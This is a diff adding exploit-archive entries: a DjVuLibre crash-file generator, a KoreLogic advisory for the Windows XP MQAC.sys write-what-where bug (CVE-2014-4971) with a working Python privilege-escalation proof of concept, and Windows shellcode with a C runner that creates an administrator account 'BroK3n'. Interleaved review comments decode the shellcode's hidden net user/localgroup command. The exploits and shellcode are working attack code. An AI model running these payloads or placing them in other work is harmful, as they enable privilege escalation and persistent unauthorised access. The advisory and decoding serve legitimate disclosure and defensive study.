Defaulted to export symbols for Wow.exe - +eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000 +eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +Wow+0xbb77: +0040bb77 8500 test dword ptr [eax],eax ds:002b:02af2000=00000000 +============================================================================== +Poc : +%systemroot%\Wow\WTF\Account\[AccountName]\macros-cache.txt + +MACRO 1 "Decursive" INV_Misc_QuestionMark +/stopcasting +/cast [target=mouseover,nomod,exists] Dispel Magic; [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic +END +MACRO 2 "PoC" INV_Misc_QuestionMark +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 :-) +END +============================================================================== +Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN] \ No newline at end of file diff --git a/platforms/windows/dos/34135.py b/platforms/windows/dos/34135.py new file mode 100755 index 000000000..c366a5c43 --- /dev/null +++ b/platforms/windows/dos/34135.py 
@@ -0,0 +1,122 @@ +from shutil import copyfile +import sys + +""" +Exploit Title: DjVuLibre <= 3.5.25 Out of Bounds Access Violation +Date: 07/14/24 +Exploit Author: drone (@dronesec) +Vendor: http://djvu.sourceforge.net/ +Software link: http://downloads.sourceforge.net/djvu/djvulibre-3.5.25.3.tar.gz +Version: <= 3.5.25.3 +Tested On: WinXP/Win7 +Patch: https://sourceforge.net/p/djvu/djvulibre-git/ci/7993b445f071a15248bd4be788a10643213cb9d2/ + +The crash occurs due to a out of bounds read + + .text:004D3BC0 mov ecx, edx + .text:004D3BC2 and ecx, 0Fh + => .text:004D3BC5 mov eax, [eax+ecx*4] + .text:004D3BC8 test eax, eax + .text:004D3BCA jnz short loc_ + +We overwrite 4 bytes in an FG44 chunk header with \xff\xff\xff\xff: + + 46 47 + 34 34 00 00 04 6E 00 64 01 02 FF FF FF FF 80 FF <= + F2 D9 81 5E 5C 51 12 AD 6B 27 14 29 F6 53 2B DD + 79 B0 01 E3 E2 71 33 58 CA 23 AE 25 35 E8 FF FF + FF FF F5 BA 7A FA 45 39 C7 CD E0 76 93 FF FF FF + FF FF F4 F1 85 98 84 DF 58 71 FE 2A 5F FF B7 16 + 31 67 4E 93 F0 2D 20 D5 58 22 39 02 26 7E A6 03 + +The crash occurs during image parsing: + + // Allocate reconstruction buffer + short *data16; + GPBuffer gdata16(data16,bw*bh); + // Copy coefficients + int i; + short *p = data16; + const IW44Image::Block *block = blocks; + for (i=0; iwrite_liftblock(liftblock); + + [...] 
+ + void + IW44Image::Block::write_liftblock(short *coeff, int bmin, int bmax) const + { + int n = bmin<<4; + memset(coeff, 0, 1024*sizeof(short)); + for (int n1=bmin; n1>4]) + return 0; + return pdata[n>>4][n&15]; + } + +Which lines up quite nicely with our inlined disassembly of the function: + + .text:004D3BB0 loc_4D3BB0: + .text:004D3BB0 mov ecx, [esp+0Ch+arg_0] + .text:004D3BB4 mov eax, edx + .text:004D3BB6 sar eax, 4 ; [n>>4] + .text:004D3BB9 mov eax, [ecx+eax*4] ; our pdata[n] data after the bitwise shift, lets call it n2 + .text:004D3BBC test eax, eax ; if(n2 == 0) + .text:004D3BBE jz short loc_4 ; return 0 + .text:004D3BC0 mov ecx, edx + .text:004D3BC2 and ecx, 0Fh ; apply n & 15, or pdata[n2][n&15], lets call it n3 +=> .text:004D3BC5 mov eax, [eax+ecx*4] ; dereference pdata[n2][n3] into d + .text:004D3BC8 test eax, eax ; test if d == 0 + .text:004D3BCA jnz short loc_ + +n2 refs to a location on the heap; may be exploitable if we stack Fg44 chunks with valid headers and malformed content, so the chunk +is allocated, then free'd, and hopefully our pointer dips into one of those free'd chunks. The returned short pointer is then used as the source in a +memcpy with a controllable destination; write-what-where. Who knows. + +Tested with SumatraPDF 2.5.2 and WinDjView 2.0.2 +""" + +if len(sys.argv) < 2: + print '[%s] ' % sys.argv[0] + sys.exit(1) + +bfile = sys.argv[1] + +# read in the data for parsing +base_data = None +with open(bfile, "rb") as f: + base_data = f.read() + +# find a valid chunk +chunk_idx = base_data.find("\x46\x47\x34\x34") +if chunk_idx == -1: + print '[-] No valid FG44 chunks found' + sys.exit(1) + +copyfile(bfile, "./%s-dos.djvu" % bfile) + +print '[!] 
Found FG44 chunk at offset %d' % chunk_idx + +# overwrite +with open("./%s-dos.djvu" % bfile, "r+b") as base: + # skip over 4 byte indicator (FG44) + # 2 byte primary header + # 2 byte secondary header + # 4 byte tertiary header + base.seek(chunk_idx+12) + base.write("\xff\xff\xff\xff") + +print '[!] %s-dos.djvu generated' % bfile \ No newline at end of file diff --git a/platforms/windows/local/34112.txt b/platforms/windows/local/34112.txt new file mode 100755 index 000000000..e738c0309 --- /dev/null +++ b/platforms/windows/local/34112.txt 
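Review bot: The usage message `print '[%s] ' % sys.argv[0]` names no argument, so a user who runs the script without a path is not told that a DjVu file is expected; the placeholder was probably lost in rendering and should read along the lines of `print 'usage: %s <input.djvu>' % sys.argv[0]`. The header `Date: 07/14/24` does not match the 2014 commit and is presumably a typo for 07/14/14. `copyfile` creates `./<name>-dos.djvu` before the `r+b` block runs, so any failure in the seek/write leaves an unmodified copy on disk; harmless, but worth a one-line comment next to the `copyfile` call.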
@@ -0,0 +1,206 @@ +Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation +Advisory ID: KL-001-2014-003 +Publication Date: 2014.07.18 +Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt + + +1. Vulnerability Details + + Affected Vendor: Microsoft + Affected Product: MQ Access Control + Affected Versions: 5.1.0.1110 + Platform: Microsoft Windows XP SP3 + CWE Classification: CWE-123: Write-what-where Condition + Impact: Privilege Escalation + Attack vector: IOCTL + CVE ID: CVE-2014-4971 + +2. Vulnerability Description + + A vulnerability within the MQAC module allows an attacker to + inject memory they control into an arbitrary location they + define. This can be used by an attacker to overwrite + HalDispatchTable+0x4 and execute arbitrary code by subsequently + calling NtQueryIntervalProfile. + +3. Technical Description + + A userland process can create a handle into the MQAC device and + subsequently make DeviceIoControlFile() calls into that device. + During the IRP handler routine for 0x1965020f the user provided + OutputBuffer address is not validated. This allows an attacker + to specify an arbitrary address and write (or overwrite) the + memory residing at the specified address. This is classically + known as a write-what-where vulnerability and has well known + exploitation methods associated with it. + + A stack trace from our fuzzing can be seen below. In our + fuzzing testcase, the specified OutputBuffer in the + DeviceIoControlFile() call is 0xffff0000. 
+ +STACK_TEXT: +b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b +b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 +b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc +b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d +b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d +b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31 +b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70 +b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7 +b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a + + Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' + command shows the fault originating in the mqac driver. + +OLLOWUP_IP: +mqac!AC2QM+5d +b230af37 891e mov dword ptr [esi],ebx + + Reviewing the TRAP_FRAME at the time of crash we can see + IopCompleteRequest() copying data from InputBuffer into the + OutputBuffer. InputBuffer is another parameter provided to the + DeviceIoControlFile() function and is therefore controllable by + the attacker. The edi register contains the invalid address + provided during the fuzz testcase. + +TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4) +ErrCode = 00000002 +eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000 +eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 +mqac!AC2QM+0x5d: +b230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=???????? + + A write-what-where vulnerability can be leveraged to obtain + escalated privileges. To do so, an attacker will need to + allocate memory in userland that is populated with shellcode + designed to find the Token for PID 4 (System) and then overwrite + the token for its own process. By leveraging the vulnerability + in MQAC it is then possible to overwrite the pointer at + HalDispatchTable+0x4 with a pointer to our shellcode. 
Calling + NtQueryIntervalProfile() will subsequently call + HalDispatchTable+0x4, execute our shellcode, and elevate the + privilege of the exploit process. + +4. Mitigation and Remediation Recommendation + + None. A patch is not likely to be forthcoming from the vendor. + +5. Credit + + This vulnerability was discovered by Matt Bergin of KoreLogic + Security, Inc. + +6. Disclosure Timeline + + 2014.04.28 - Initial contact; sent Microsoft report and PoC. + 2014.04.28 - Microsoft acknowledges receipt of vulnerability + report; states XP is no longer supported and asks if + the vulnerability affects other versions of Windows. + 2014.04.29 - KoreLogic asks Microsoft for clarification of their + support policy for XP. + 2014.04.29 - Microsoft says XP-only vulnerabilities will not be + addressed with patches. + 2014.04.29 - KoreLogic asks if Microsoft intends to address the + vulnerability report. + 2014.04.29 - Microsoft opens case to investigate the impact of the + vulnerability on non-XP systems. + 2014.05.06 - Microsoft asks again if this vulnerability affects + non-XP systems. + 2014.05.14 - KoreLogic informs Microsoft that the vulnerability + report is for XP and other Windows versions have + not been examined. + 2014.06.11 - KoreLogic informs Microsoft that 30 business days + have passed since vendor acknowledgement of the + initial report. KoreLogic requests CVE number for the + vulnerability, if there is one. KoreLogic also + requests vendor's public identifier for the + vulnerability along with the expected disclosure date. + 2014.06.11 - Microsoft responds to KoreLogic that the + vulnerability does not affect an "up-platform" + product. Says they are investigating embedded + platforms. Does not provide a CVE number or a + disclosure date. + 2014.06.30 - KoreLogic asks Microsoft for confirmation of their + receipt of the updated PoC. Also requests that + a CVE ID be issued to this vulnerability. 
+ 2014.07.02 - 45 business days have elapsed since Microsoft + acknowledged receipt of the vulnerability report and + PoC. + 2014.07.07 - KoreLogic requests CVE from MITRE. + 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to + be identical to KL-001-2014-002 and issues + CVE-2014-4971 for both vulnerabilities. + 2014.07.18 - Public disclosure. + +7. Proof of Concept + + #!/usr/bin/python2 + # + # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation + # Matt Bergin (KoreLogic / Smash the Stack) + # CVE-2014-4971 + # + from ctypes import * + from struct import pack + from os import getpid,system + from sys import exit + EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA + GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle + INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 + + # thanks to offsec for the concept + # I re-wrote the code as to not fully insult them :) + def getBase(name=None): + retArray = c_ulong*1024 + ImageBase = retArray() + callback = c_int(1024) + cbNeeded = c_long() + EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) + for base in ImageBase: + driverName = c_char_p("\x00"*1024) + GetDeviceDriverBaseNameA(base,driverName,48) + if (name): + if (driverName.value.lower() == name): + return base + else: + return (base,driverName.value) + return None + + handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) + print "[+] Handle \\\\.\\MQAC @ %s" % (handle) + 
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) + buf = "\x50\x00\x00\x00"+"\x90"*0x400 + WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0))) + WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) + WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0))) + #Overwrite Pointer + kBase,kVer = getBase() + hKernel = LoadLibraryExA(kVer,0,1) + HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable") + HalDispatchTable -= hKernel + HalDispatchTable += kBase + HalDispatchTable += 0x4 + print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable)) + DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0) + print "[+] HalDispatchTable+0x4 overwritten" + CloseHandle(handle) + NtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) + exit(0) + +The contents of this advisory are copyright(c) 2014 +KoreLogic, Inc. and are licensed under a Creative Commons +Attribution Share-Alike 4.0 (United States) License: +http://creativecommons.org/licenses/by-sa/4.0/ + +KoreLogic, Inc. is a founder-owned and operated company with a +proven track record of providing security services to entities +ranging from Fortune 500 to small and mid-sized companies. We +are a highly skilled team of senior security consultants doing +by-hand security assessments for the most important networks in +the U.S. and around the world. We are also developers of various +tools and resources aimed at helping the security community. +https://www.korelogic.com/about-korelogic.html + +Our public vulnerability disclosure policy is available at: +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt \ No newline at end of file diff --git a/platforms/windows/shellcode/33836.txt b/platforms/windows/shellcode/33836.txt new file mode 100755 index 000000000..2936c7e19 --- /dev/null +++ b/platforms/windows/shellcode/33836.txt 
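Review bot: Section 4 states "None" under mitigation, yet the PoC in section 7 shows the fault is only reachable after CreateFileA succeeds on the `\\.\MQAC` device and IOCTL code 0x1965020f is issued with a kernel address as OutputBuffer, so hosts without the component that provides that device (presumably Message Queuing) are not exposed and a local caller must first be allowed to open it; saying so in section 4 would give administrators a concrete hardening check (is the device present, who may open it) and a monitoring hook (that IOCTL with a non-user OutputBuffer) instead of nothing. Separately, the PoC defines INVALID_HANDLE_VALUE but never compares the CreateFileA result against it, so when the device cannot be opened it still prints a handle of -1, issues DeviceIoControlFile on it and reports "HalDispatchTable+0x4 overwritten"; `if handle == INVALID_HANDLE_VALUE: exit(1)` directly after the CreateFileA line would keep its output honest. Section 3 describes the IRP handler without naming the device path, so tying the description to the `\\.\MQAC` path used by the PoC would make the two sections consistent.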
@@ -0,0 +1,27 @@
+Add Admin User Shellcode (194 bytes) - Any Windows Version
+========================================================
+
+Title: Add Admin User Shellcode (194 bytes) - Any Windows Version
+Release date: 21/06/2014
+Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
+Size: 194 byte (NULL free)
+Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
+Username: BroK3n
+Password: BroK3n
+
+char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
+ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
+ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
+ "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
+ "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
+ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
+ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
+ "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
+ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
+ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
+ "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
+ "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
+ "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
+
+
+int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}
\ No newline at end of file
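Review bot: The header records size, tested versions and the BroK3n credentials but never states what the payload executes, which is the one fact a defender needs from a shellcode listing. Reading the 0x68 push immediates in the byte string, the payload assembles `cmd.exe /c net user BroK3n BroK3n /ADD && net localgroup Administrators /ADD BroK3n` on the stack and hands it to the export matched by the `WinE` compare at `\x81\x3e\x57\x69\x6e\x45`, presumably WinExec; a header line such as `Executes: cmd.exe /c net user BroK3n BroK3n /ADD && net localgroup Administrators /ADD BroK3n` would document that, and it is also the exact command line process-creation logging (and the resulting user-created / group-membership-changed events) will show. In the harness, the `(int)` in `(int)(*f)();` casts a result that is immediately discarded, so `(*f)();` says the same thing, and argc/argv are unused, so `int main(void)` would be the honest signature.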